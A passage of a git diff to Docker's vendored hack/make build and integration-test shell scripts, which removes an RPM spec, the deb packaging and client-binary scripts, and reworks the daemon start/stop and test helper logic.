-v -./bundles/%{_origversion}/dynbinary-daemon/dockerd -v - -%install -# install binary -install -d $RPM_BUILD_ROOT/%{_bindir} -install -p -m 755 bundles/%{_origversion}/dynbinary-client/docker-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/docker -install -p -m 755 bundles/%{_origversion}/dynbinary-daemon/dockerd-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/dockerd - -# install proxy -install -p -m 755 /usr/local/bin/docker-proxy $RPM_BUILD_ROOT/%{_bindir}/docker-proxy - -# install containerd -install -p -m 755 /usr/local/bin/docker-containerd $RPM_BUILD_ROOT/%{_bindir}/docker-containerd -install -p -m 755 /usr/local/bin/docker-containerd-shim $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-shim -install -p -m 755 /usr/local/bin/docker-containerd-ctr $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-ctr - -# install runc -install -p -m 755 /usr/local/bin/docker-runc $RPM_BUILD_ROOT/%{_bindir}/docker-runc - -# install tini -install -p -m 755 /usr/local/bin/docker-init $RPM_BUILD_ROOT/%{_bindir}/docker-init - -# install udev rules -install -d $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d -install -p -m 644 contrib/udev/80-docker.rules $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d/80-docker.rules - -# add init scripts -install -d $RPM_BUILD_ROOT/etc/sysconfig -install -d $RPM_BUILD_ROOT/%{_initddir} - - -%if 0%{?is_systemd} -install -d $RPM_BUILD_ROOT/%{_unitdir} -install -p -m 644 contrib/init/systemd/docker.service.rpm $RPM_BUILD_ROOT/%{_unitdir}/docker.service -%else -install -p -m 644 contrib/init/sysvinit-redhat/docker.sysconfig $RPM_BUILD_ROOT/etc/sysconfig/docker -install -p -m 755 contrib/init/sysvinit-redhat/docker $RPM_BUILD_ROOT/%{_initddir}/docker -%endif -# add bash, zsh, and fish completions -install -d $RPM_BUILD_ROOT/usr/share/bash-completion/completions -install -d $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions -install -d $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d -install -p -m 644 contrib/completion/bash/docker $RPM_BUILD_ROOT/usr/share/bash-completion/completions/docker -install -p -m 644 contrib/completion/zsh/_docker $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions/_docker -install -p -m 644 contrib/completion/fish/docker.fish $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d/docker.fish - -# install manpages -install -d %{buildroot}%{_mandir}/man1 -install -p -m 644 man/man1/*.1 $RPM_BUILD_ROOT/%{_mandir}/man1 -install -d %{buildroot}%{_mandir}/man5 -install -p -m 644 man/man5/*.5 $RPM_BUILD_ROOT/%{_mandir}/man5 -install -d %{buildroot}%{_mandir}/man8 -install -p -m 644 man/man8/*.8 $RPM_BUILD_ROOT/%{_mandir}/man8 - -# add vimfiles -install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc -install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect -install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax -install -p -m 644 contrib/syntax/vim/doc/dockerfile.txt $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc/dockerfile.txt -install -p -m 644 contrib/syntax/vim/ftdetect/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect/dockerfile.vim -install -p -m 644 contrib/syntax/vim/syntax/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax/dockerfile.vim - -# add nano -install -d $RPM_BUILD_ROOT/usr/share/nano -install -p -m 644 contrib/syntax/nano/Dockerfile.nanorc $RPM_BUILD_ROOT/usr/share/nano/Dockerfile.nanorc - -# list files owned by the package here -%files -%doc AUTHORS CHANGELOG.md CONTRIBUTING.md LICENSE MAINTAINERS NOTICE README.md -/%{_bindir}/docker -/%{_bindir}/dockerd -/%{_bindir}/docker-containerd -/%{_bindir}/docker-containerd-shim -/%{_bindir}/docker-containerd-ctr -/%{_bindir}/docker-proxy -/%{_bindir}/docker-runc -/%{_bindir}/docker-init -/%{_sysconfdir}/udev/rules.d/80-docker.rules -%if 0%{?is_systemd} -/%{_unitdir}/docker.service -%else -%config(noreplace,missingok) /etc/sysconfig/docker -/%{_initddir}/docker -%endif -/usr/share/bash-completion/completions/docker -/usr/share/zsh/vendor-completions/_docker -/usr/share/fish/vendor_completions.d/docker.fish -%doc -/%{_mandir}/man1/* -/%{_mandir}/man5/* -/%{_mandir}/man8/* -/usr/share/vim/vimfiles/doc/dockerfile.txt -/usr/share/vim/vimfiles/ftdetect/dockerfile.vim -/usr/share/vim/vimfiles/syntax/dockerfile.vim -/usr/share/nano/Dockerfile.nanorc - -%post -%if 0%{?is_systemd} -%systemd_post docker -%else -# This adds the proper /etc/rc*.d links for the script -/sbin/chkconfig --add docker -%endif -if ! getent group docker > /dev/null; then - groupadd --system docker -fi - -%preun -%if 0%{?is_systemd} -%systemd_preun docker -%else -if [ $1 -eq 0 ] ; then - /sbin/service docker stop >/dev/null 2>&1 - /sbin/chkconfig --del docker -fi -%endif - -%postun -%if 0%{?is_systemd} -%systemd_postun_with_restart docker -%else -if [ "$1" -ge "1" ] ; then - /sbin/service docker condrestart >/dev/null 2>&1 || : -fi -%endif - -%changelog diff --git a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch index 73955392d0..91e2c53c75 100644 --- a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch +++ b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch @@ -1,7 +1,11 @@ -#!/bin/bash +#!/usr/bin/env bash set -e docker-version-osarch() { + if ! type docker &>/dev/null; then + # docker is not installed + return + fi local target="$1" # "Client" or "Server" local fmtStr="{{.${target}.Os}}/{{.${target}.Arch}}" if docker version -f "$fmtStr" 2>/dev/null; then @@ -19,7 +23,7 @@ docker-version-osarch() { } # Retrieve OS/ARCH of docker daemon, e.g. linux/amd64 -export DOCKER_ENGINE_OSARCH="$(docker-version-osarch 'Server')" +export DOCKER_ENGINE_OSARCH="${DOCKER_ENGINE_OSARCH:=$(docker-version-osarch 'Server')}" export DOCKER_ENGINE_GOOS="${DOCKER_ENGINE_OSARCH%/*}" export DOCKER_ENGINE_GOARCH="${DOCKER_ENGINE_OSARCH##*/}" DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:=amd64} @@ -30,40 +34,10 @@ export DOCKER_CLIENT_GOOS="${DOCKER_CLIENT_OSARCH%/*}" export DOCKER_CLIENT_GOARCH="${DOCKER_CLIENT_OSARCH##*/}" DOCKER_CLIENT_GOARCH=${DOCKER_CLIENT_GOARCH:=amd64} -# Retrieve the architecture used in contrib/builder/(deb|rpm)/$PACKAGE_ARCH/ -PACKAGE_ARCH='amd64' -case "${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" in - arm) - PACKAGE_ARCH='armhf' - ;; - arm64) - PACKAGE_ARCH='aarch64' - ;; - amd64|ppc64le|s390x) - PACKAGE_ARCH="${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" - ;; - *) - echo >&2 "warning: not sure how to convert '$DOCKER_ENGINE_GOARCH' to a 'Docker' arch, assuming '$PACKAGE_ARCH'" - ;; -esac -export PACKAGE_ARCH - DOCKERFILE='Dockerfile' -TEST_IMAGE_NAMESPACE= -case "$PACKAGE_ARCH" in - amd64) - case "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" in - windows) - DOCKERFILE='Dockerfile.windows' - ;; - solaris) - DOCKERFILE='Dockerfile.solaris' - ;; - esac - ;; - *) - DOCKERFILE="Dockerfile.$PACKAGE_ARCH" - TEST_IMAGE_NAMESPACE="$PACKAGE_ARCH" - ;; -esac -export DOCKERFILE TEST_IMAGE_NAMESPACE + +if [ "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" = "windows" ]; then + DOCKERFILE='Dockerfile.windows' +fi + +export DOCKERFILE diff --git a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs index e71a30ae81..898cc22834 100644 --- a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs +++ b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs @@ -1,23 +1,23 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -if ! docker inspect emptyfs &> /dev/null; then - # let's build a "docker save" tarball for "emptyfs" +if ! docker image inspect emptyfs > /dev/null; then + # build a "docker save" tarball for "emptyfs" # see https://github.com/docker/docker/pull/5262 # and also https://github.com/docker/docker/issues/4242 dir="$DEST/emptyfs" - mkdir -p "$dir" + uuid=511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 + mkdir -p "$dir/$uuid" ( - cd "$dir" - echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > repositories - mkdir -p 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 - ( - cd 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 - echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json - echo '1.0' > VERSION - tar -cf layer.tar --files-from /dev/null - ) + echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > "$dir/repositories" + cd "$dir/$uuid" + echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json + echo '1.0' > VERSION + tar -cf layer.tar --files-from /dev/null + ) + ( + [ -n "$TESTDEBUG" ] && set -x + tar -cC "$dir" . | docker load ) - ( set -x; tar -cC "$dir" . | docker load ) rm -rf "$dir" fi diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen b/vendor/github.com/docker/docker/hack/make/.go-autogen index 4d26052bb7..ba001895d8 100644 --- a/vendor/github.com/docker/docker/hack/make/.go-autogen +++ b/vendor/github.com/docker/docker/hack/make/.go-autogen @@ -1,8 +1,10 @@ -#!/bin/bash +#!/usr/bin/env bash rm -rf autogen -source hack/dockerfile/binaries-commits +source hack/dockerfile/install/runc.installer +source hack/dockerfile/install/tini.installer +source hack/dockerfile/install/containerd.installer cat > dockerversion/version_autogen.go < param( [Parameter(Mandatory=$true)][string]$CommitString, - [Parameter(Mandatory=$true)][string]$DockerVersion + [Parameter(Mandatory=$true)][string]$DockerVersion, + [Parameter(Mandatory=$false)][string]$Platform ) $ErrorActionPreference = "Stop" @@ -43,6 +44,7 @@ const ( GitCommit string = "'+$CommitString+'" Version string = "'+$DockerVersion+'" BuildTime string = "'+$buildDateTime+'" + PlatformName string = "'+$Platform+'" ) // AUTOGENERATED FILE; see hack\make\.go-autogen.ps1 diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup index 0efde717fc..c130e23560 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup @@ -1,7 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -bundle .detect-daemon-osarch -if [ $DOCKER_ENGINE_GOOS != "windows" ]; then +source "$MAKEDIR/.detect-daemon-osarch" +if [ "$DOCKER_ENGINE_GOOS" != "windows" ]; then bundle .ensure-emptyfs fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start index b96979bdb2..20801fccee 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start @@ -1,12 +1,19 @@ -#!/bin/bash +#!/usr/bin/env bash -# see test-integration-cli for example usage of this script +# see test-integration for example usage of this script base="$ABS_DEST/.." -export PATH="$base/binary-client:$base/binary-daemon:$base/dynbinary-client:$base/dynbinary-daemon:$PATH" +export PATH="$base/binary-daemon:$base/dynbinary-daemon:$PATH" -if ! command -v docker &> /dev/null; then - echo >&2 'error: binary-client or dynbinary-client must be run before .integration-daemon-start' +export TEST_CLIENT_BINARY=docker + +if [ -n "$DOCKER_CLI_PATH" ]; then + export TEST_CLIENT_BINARY=/usr/local/cli/$(basename "$DOCKER_CLI_PATH") +fi + +echo "Using test binary $TEST_CLIENT_BINARY" +if ! command -v "$TEST_CLIENT_BINARY" &> /dev/null; then + echo >&2 'error: missing test client $TEST_CLIENT_BINARY' false fi @@ -44,12 +51,13 @@ if [ -n "$DOCKER_STORAGE_OPTS" ]; then unset IFS fi -# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +# example usage: DOCKER_REMAP_ROOT=default extra_params="" if [ "$DOCKER_REMAP_ROOT" ]; then extra_params="--userns-remap $DOCKER_REMAP_ROOT" fi +# example usage: DOCKER_EXPERIMENTAL=1 if [ "$DOCKER_EXPERIMENTAL" ]; then echo >&2 '# DOCKER_EXPERIMENTAL is set: starting daemon with experimental features enabled! ' extra_params="$extra_params --experimental" @@ -62,24 +70,26 @@ if [ -z "$DOCKER_TEST_HOST" ]; then # see https://github.com/docker/libcontainer/blob/master/apparmor/apparmor.go#L16 export container="" ( - set -x + [ -n "$TESTDEBUG" ] && set -x /etc/init.d/apparmor start ) fi - export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" # "pwd" tricks to make sure $DEST is an absolute path, not a relative one - ( set -x; exec \ - dockerd --debug \ - --host "$DOCKER_HOST" \ - --storage-driver "$DOCKER_GRAPHDRIVER" \ - --pidfile "$DEST/docker.pid" \ - --userland-proxy="$DOCKER_USERLANDPROXY" \ - $storage_params \ - $extra_params \ - &> "$DEST/docker.log" + # "pwd" tricks to make sure $DEST is an absolute path, not a relative one + export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" + ( + echo "Starting dockerd" + [ -n "$TESTDEBUG" ] && set -x + exec \ + dockerd --debug \ + --host "$DOCKER_HOST" \ + --storage-driver "$DOCKER_GRAPHDRIVER" \ + --pidfile "$DEST/docker.pid" \ + --userland-proxy="$DOCKER_USERLANDPROXY" \ + $storage_params \ + $extra_params \ + &> "$DEST/docker.log" ) & - # make sure that if the script exits unexpectedly, we stop this daemon we just started - trap 'bundle .integration-daemon-stop' EXIT else export DOCKER_HOST="$DOCKER_TEST_HOST" fi @@ -87,7 +97,7 @@ fi # give it a little time to come up so it's "ready" tries=60 echo "INFO: Waiting for daemon to start..." -while ! docker version &> /dev/null; do +while ! $TEST_CLIENT_BINARY version &> /dev/null; do (( tries-- )) if [ $tries -le 0 ]; then printf "\n" @@ -95,8 +105,8 @@ while ! docker version &> /dev/null; do echo >&2 "error: daemon failed to start" echo >&2 " check $DEST/docker.log for details" else - echo >&2 "error: daemon at $DOCKER_HOST fails to 'docker version':" - docker version >&2 || true + echo >&2 "error: daemon at $DOCKER_HOST fails to '$TEST_CLIENT_BINARY version':" + $TEST_CLIENT_BINARY version >&2 || true # Additional Windows CI debugging as this is a common error as of # January 2016 if [ "$(go env GOOS)" = 'windows' ]; then diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop index 03c1b14689..c1d43e1a5e 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop @@ -1,11 +1,12 @@ -#!/bin/bash +#!/usr/bin/env bash if [ ! "$(go env GOOS)" = 'windows' ]; then - trap - EXIT # reset EXIT trap applied in .integration-daemon-start - for pidFile in $(find "$DEST" -name docker.pid); do - pid=$(set -x; cat "$pidFile") - ( set -x; kill "$pid" ) + pid=$([ -n "$TESTDEBUG" ] && set -x; cat "$pidFile") + ( + [ -n "$TESTDEBUG" ] && set -x + kill "$pid" + ) if ! wait "$pid"; then echo >&2 "warning: PID $pid from $pidFile had a nonzero exit code" fi @@ -15,7 +16,7 @@ if [ ! "$(go env GOOS)" = 'windows' ]; then # Stop apparmor if it is enabled if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then ( - set -x + [ -n "$TESTDEBUG" ] && set -x /etc/init.d/apparmor stop ) fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers index 7b73b2f140..da2bb7cad2 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers +++ b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers @@ -1,64 +1,91 @@ -#!/bin/bash - -: ${TEST_REPEAT:=0} - -bundle_test_integration_cli() { - TESTFLAGS="$TESTFLAGS -check.v -check.timeout=${TIMEOUT} -test.timeout=360m" - go_test_dir integration-cli $DOCKER_INTEGRATION_TESTS_VERIFIED -} - -# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. -# You can use this to select certain tests to run, e.g. -# -# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit +#!/usr/bin/env bash # # For integration-cli test, we use [gocheck](https://labix.org/gocheck), if you want # to run certain tests on your local host, you should run with command: # -# TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration-cli +# TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration # -go_test_dir() { - dir=$1 - precompiled=$2 - testbinary="$DEST/test.main" - testcover=() - testcoverprofile=() - ( - mkdir -p "$DEST/coverprofiles" - export DEST="$ABS_DEST" # in a subshell this is safe -- our integration-cli tests need DEST, and "cd" screws it up - if [ -z $precompiled ]; then - ensure_test_dir $1 $testbinary - fi - cd "$dir" - i=0 - while ((++i)); do - test_env "$testbinary" $TESTFLAGS - if [ $i -gt "$TEST_REPEAT" ]; then - break - fi - echo "Repeating test ($i)" - done - ) +if [ -z $MAKEDIR ]; then + export MAKEDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +fi +source "$MAKEDIR/.go-autogen" + +# Set defaults +: ${TEST_REPEAT:=1} +: ${TESTFLAGS:=} +: ${TESTDEBUG:=} + +integration_api_dirs=${TEST_INTEGRATION_DIR:-"$( + find ./integration -type d | + grep -vE '(^./integration($|/internal)|/testdata)')"} + +run_test_integration() { + [[ "$TESTFLAGS" != *-check.f* ]] && run_test_integration_suites + run_test_integration_legacy_suites +} + +run_test_integration_suites() { + local flags="-test.v -test.timeout=${TIMEOUT} $TESTFLAGS" + for dir in $integration_api_dirs; do + if ! ( + cd $dir + echo "Running $PWD" + test_env ./test.main $flags + ); then exit 1; fi + done } -ensure_test_dir() { +run_test_integration_legacy_suites() { ( - # make sure a test dir will compile - dir="$1" - out="$2" - echo Building test dir: "$dir" - set -xe - cd "$dir" - go test -c -o "$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" + flags="-check.v -check.timeout=${TIMEOUT} -test.timeout=360m $TESTFLAGS" + cd integration-cli + echo "Running $PWD" + test_env ./test.main $flags ) } +build_test_suite_binaries() { + if [ ${DOCKER_INTEGRATION_TESTS_VERIFIED-} ]; then + echo "Skipping building test binaries; as DOCKER_INTEGRATION_TESTS_VERIFIED is set" + return + fi + build_test_suite_binary ./integration-cli "test.main" + for dir in $integration_api_dirs; do + build_test_suite_binary "$dir" "test.main" + done +} + +# Build a binary for a test suite package +build_test_suite_binary() { + local dir="$1" + local out="$2" + echo Building test suite binary "$dir/$out" + go test -c -o "$dir/$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" "$dir" +} + +cleanup_test_suite_binaries() { + [ -n "$TESTDEBUG" ] && return + echo "Removing test suite binaries" + find integration* -name test.main | xargs -r rm +} + +repeat() { + for i in $(seq 1 $TEST_REPEAT); do + echo "Running integration-test (iteration $i)" + $@ + done +} + +# use "env -i" to tightly control the environment variables that bleed into the tests test_env() { ( - set -xe - # use "env -i" to tightly control the environment variables that bleed into the tests + set -e + [ -n "$TESTDEBUG" ] && set -x env -i \ - DEST="$DEST" \ + DEST="$ABS_DEST" \ + DOCKER_API_VERSION="$DOCKER_API_VERSION" \ + DOCKER_BUILDKIT="$DOCKER_BUILDKIT" \ + DOCKER_INTEGRATION_DAEMON_DEST="$DOCKER_INTEGRATION_DAEMON_DEST" \ DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \ DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \ DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \ @@ -73,7 +100,23 @@ test_env() { HOME="$ABS_DEST/fake-HOME" \ PATH="$PATH" \ TEMP="$TEMP" \ - TEST_IMAGE_NAMESPACE="$TEST_IMAGE_NAMESPACE" \ + TEST_CLIENT_BINARY="$TEST_CLIENT_BINARY" \ "$@" ) } + + +error_on_leaked_containerd_shims() { + if [ "$(go env GOOS)" == 'windows' ]; then + return + fi + + leftovers=$(ps -ax -o pid,cmd | + awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration/ { print $1 }') + if [ -n "$leftovers" ]; then + ps aux + kill -9 $leftovers 2> /dev/null + echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!" + exit 1 + fi +} diff --git a/vendor/github.com/docker/docker/hack/make/README.md b/vendor/github.com/docker/docker/hack/make/README.md index 6574b0efe6..3d069fa165 100644 --- a/vendor/github.com/docker/docker/hack/make/README.md +++ b/vendor/github.com/docker/docker/hack/make/README.md @@ -4,10 +4,9 @@ Each script is named after the bundle it creates. They should not be called directly - instead, pass it as argument to make.sh, for example: ``` -./hack/make.sh test ./hack/make.sh binary ubuntu -# Or to run all bundles: +# Or to run all default bundles: ./hack/make.sh ``` diff --git a/vendor/github.com/docker/docker/hack/make/binary b/vendor/github.com/docker/docker/hack/make/binary index 88b22cd462..eab69bb065 100644 --- a/vendor/github.com/docker/docker/hack/make/binary +++ b/vendor/github.com/docker/docker/hack/make/binary @@ -1,13 +1,8 @@ -#!/bin/bash +#!/usr/bin/env bash set -e rm -rf "$DEST" # This script exists as backwards compatibility for CI -( - DEST="${DEST}-client" - ABS_DEST="${ABS_DEST}-client" - . hack/make/binary-client -) ( DEST="${DEST}-daemon" ABS_DEST="${ABS_DEST}-daemon" diff --git a/vendor/github.com/docker/docker/hack/make/binary-client b/vendor/github.com/docker/docker/hack/make/binary-client deleted file mode 100644 index 1731fea8b0..0000000000 --- a/vendor/github.com/docker/docker/hack/make/binary-client +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -set -e - -[ -z "$KEEPDEST" ] && \ - rm -rf "$DEST" - -( - source "${MAKEDIR}/.binary-setup" - export BINARY_SHORT_NAME="$DOCKER_CLIENT_BINARY_NAME" - export GO_PACKAGE='github.com/docker/docker/cmd/docker' - source "${MAKEDIR}/.binary" -) diff --git a/vendor/github.com/docker/docker/hack/make/binary-daemon b/vendor/github.com/docker/docker/hack/make/binary-daemon index e255543c16..f68163636b 100644 --- a/vendor/github.com/docker/docker/hack/make/binary-daemon +++ b/vendor/github.com/docker/docker/hack/make/binary-daemon @@ -1,13 +1,27 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -[ -z "$KEEPDEST" ] && \ - rm -rf "$DEST" +copy_binaries() { + local dir="$1" + local hash="$2" + # Add nested executables to bundle dir so we have complete set of + # them available, but only if the native OS/ARCH is the same as the + # OS/ARCH of the build target + if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then + return + fi + if [ ! -x /usr/local/bin/docker-runc ]; then + return + fi + echo "Copying nested executables into $dir" + for file in containerd containerd-shim containerd-ctr runc init proxy; do + cp -f `which "docker-$file"` "$dir/" + if [ "$hash" == "hash" ]; then + hash_files "$dir/docker-$file" + fi + done +} -( - source "${MAKEDIR}/.binary-setup" - export BINARY_SHORT_NAME="$DOCKER_DAEMON_BINARY_NAME" - export GO_PACKAGE='github.com/docker/docker/cmd/dockerd' - source "${MAKEDIR}/.binary" - copy_binaries "$DEST" 'hash' -) +[ -z "$KEEPDEST" ] && rm -rf "$DEST" +source "${MAKEDIR}/.binary" +copy_binaries "$DEST" 'hash' diff --git a/vendor/github.com/docker/docker/hack/make/build-deb b/vendor/github.com/docker/docker/hack/make/build-deb deleted file mode 100644 index d3c28591a6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/build-deb +++ /dev/null @@ -1,91 +0,0 @@ -#!/bin/bash -set -e - -# subshell so that we can export PATH and TZ without breaking other things -( - export TZ=UTC # make sure our "date" variables are UTC-based - bundle .integration-daemon-start - bundle .detect-daemon-osarch - - # TODO consider using frozen images for the dockercore/builder-deb tags - - tilde='~' # ouch Bash 4.2 vs 4.3, you keel me - debVersion="${VERSION//-/$tilde}" # using \~ or '~' here works in 4.3, but not 4.2; just ~ causes $HOME to be inserted, hence the $tilde - # if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better - if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - gitUnix="$(git log -1 --pretty='%at')" - gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')" - gitCommit="$(git log -1 --pretty='%h')" - gitVersion="git${gitDate}.0.${gitCommit}" - # gitVersion is now something like 'git20150128.112847.0.17e840a' - debVersion="$debVersion~$gitVersion" - - # $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false - # true - # $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false - # true - # $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false - # true - - # ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a - fi - - debSource="$(awk -F ': ' '$1 == "Source" { print $2; exit }' hack/make/.build-deb/control)" - debMaintainer="$(awk -F ': ' '$1 == "Maintainer" { print $2; exit }' hack/make/.build-deb/control)" - debDate="$(date --rfc-2822)" - - # if go-md2man is available, pre-generate the man pages - make manpages - - builderDir="contrib/builder/deb/${PACKAGE_ARCH}" - pkgs=( $(find "${builderDir}/"*/ -type d) ) - if [ ! -z "$DOCKER_BUILD_PKGS" ]; then - pkgs=() - for p in $DOCKER_BUILD_PKGS; do - pkgs+=( "$builderDir/$p" ) - done - fi - for dir in "${pkgs[@]}"; do - [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } - version="$(basename "$dir")" - suite="${version##*-}" - - image="dockercore/builder-deb:$version" - if ! docker inspect "$image" &> /dev/null; then - ( - # Add the APT_MIRROR args only if the consuming Dockerfile uses it - # Otherwise this will cause the build to fail - if [ "$(grep 'ARG APT_MIRROR=' $dir/Dockerfile)" ] && [ "$BUILD_APT_MIRROR" ]; then - DOCKER_BUILD_ARGS="$DOCKER_BUILD_ARGS $BUILD_APT_MIRROR" - fi - set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" - ) - fi - - mkdir -p "$DEST/$version" - cat > "$DEST/$version/Dockerfile.build" <<-EOF - FROM $image - WORKDIR /usr/src/docker - COPY . /usr/src/docker - ENV DOCKER_GITCOMMIT $GITCOMMIT - RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers \ - && ln -snf /usr/src/docker /go/src/github.com/docker/docker - EOF - - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - # Install runc, containerd, proxy and tini - RUN ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini - EOF - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - RUN cp -aL hack/make/.build-deb debian - RUN { echo '$debSource (${debVersion}-0~${version}) $suite; urgency=low'; echo; echo ' * Version: $VERSION'; echo; echo " -- $debMaintainer $debDate"; } > debian/changelog && cat >&2 debian/changelog - RUN dpkg-buildpackage -uc -us -I.git - EOF - tempImage="docker-temp/build-deb:$version" - ( set -x && docker build -t "$tempImage" -f "$DEST/$version/Dockerfile.build" . ) - docker run --rm "$tempImage" bash -c 'cd .. && tar -c *_*' | tar -xvC "$DEST/$version" - docker rmi "$tempImage" - done - - bundle .integration-daemon-stop -) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary old mode 100644 new mode 100755 index 2039be416f..bbd5a22bcc --- a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary +++ b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary @@ -1,11 +1,7 @@ -#!/bin/bash 